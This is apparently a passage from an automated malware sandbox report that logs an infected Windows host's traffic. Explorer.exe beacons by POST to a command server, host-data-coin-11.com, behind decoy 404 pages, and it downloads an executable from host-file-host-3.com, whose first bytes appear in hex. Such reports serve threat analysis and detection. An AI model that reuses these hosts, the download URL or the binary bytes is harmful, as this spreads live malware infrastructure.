                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                16192.168.2.34977695.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:39.595597982 CET3128OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://viqgctnic.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 234
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:39.694449902 CET3134INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                17192.168.2.34977895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:39.815232038 CET3137OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://xpkskgrr.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 205
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:39.920986891 CET3139INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                18192.168.2.34977995.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:40.013690948 CET3141OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://kdyponywr.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 344
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:40.118258953 CET3154INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:40 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                19192.168.2.34978095.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:40.222048044 CET3176OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://rxdwffwjbf.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 136
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:40.321014881 CET3177INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:40 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                2192.168.2.34975095.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:26.243459940 CET1097OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://jmuwhyhn.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 316
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:26.347946882 CET1098INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:26 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                20192.168.2.34978295.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:40.408685923 CET3179OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://molwdgi.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 231
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:40.512445927 CET3182INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:40 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 48 ec a0 8a 70 bc 57 da 4a d4 f6 2e 87 25 eb c3 94 58 23 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OU&1UPJ%9HpWJ.%X#c0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                21192.168.2.34978695.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:40.885488987 CET3223OUTGET /files/6096_1638289274_6885.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
                                                                                                                                                                                Dec 1, 2021 10:04:40.966351986 CET3227INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:40 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 163328
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Tue, 30 Nov 2021 16:21:14 GMT
                                                                                                                                                                                ETag: "27e00-5d203f23b200e"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 53 ec f2 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 42 01 00 00 ec 74 02 00 00 00 00 12 2a 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 76 02 00 04 00 00 78 5b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 e8 01 00 78 00 00 00 00 b0 75 02 18 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 95 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 40 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 90 00 00 00 60 01 00 00 92 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 75 73 02 00 00 02 00 00 18 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 65 66 65 67 00 00 72 02 00 00 00 80 75 02 00 04 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 75 79 75 73 00 00 70 02 00 00 00 90 75 02 00 04 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 76 65 6e 75 00 00 00 17 00 00 00 00 a0 75 02 00 02 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 60 2e 72 73 72 63 00 00 00 18 83 00 00 00 b0 75 02 00 84 00 00 00 fa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 44 24 04 c2 04 00 81 00 40 36 ef c6 c3 55 8b ec 81 ec 2c 0c 00 00 8b 45 08 53 56 8b 30 8b 40 04 57 33 ff 81 3d 04 50 b5 02 ee 00 00 00 89 45 f8 75 09 57 57
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELS_Bt*`@@vx[Dxua@`d.textP@B `.rdata~`F@@.data`us@.fefegru@@.guyuspu@`.venuu@`.rsrcu@@3D$@6U,ESV0@W3=PEuWW


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                22192.168.2.34979995.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:43.433692932 CET3849OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://gghke.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 189
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:43.534595013 CET3849INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:43 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                23192.168.2.34980195.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:43.629026890 CET3852OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://dpsjrby.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 224
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:43.731081009 CET3854INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:43 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                24192.168.2.34980395.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:43.826879978 CET3856OUTPOST / HTTP/1.1
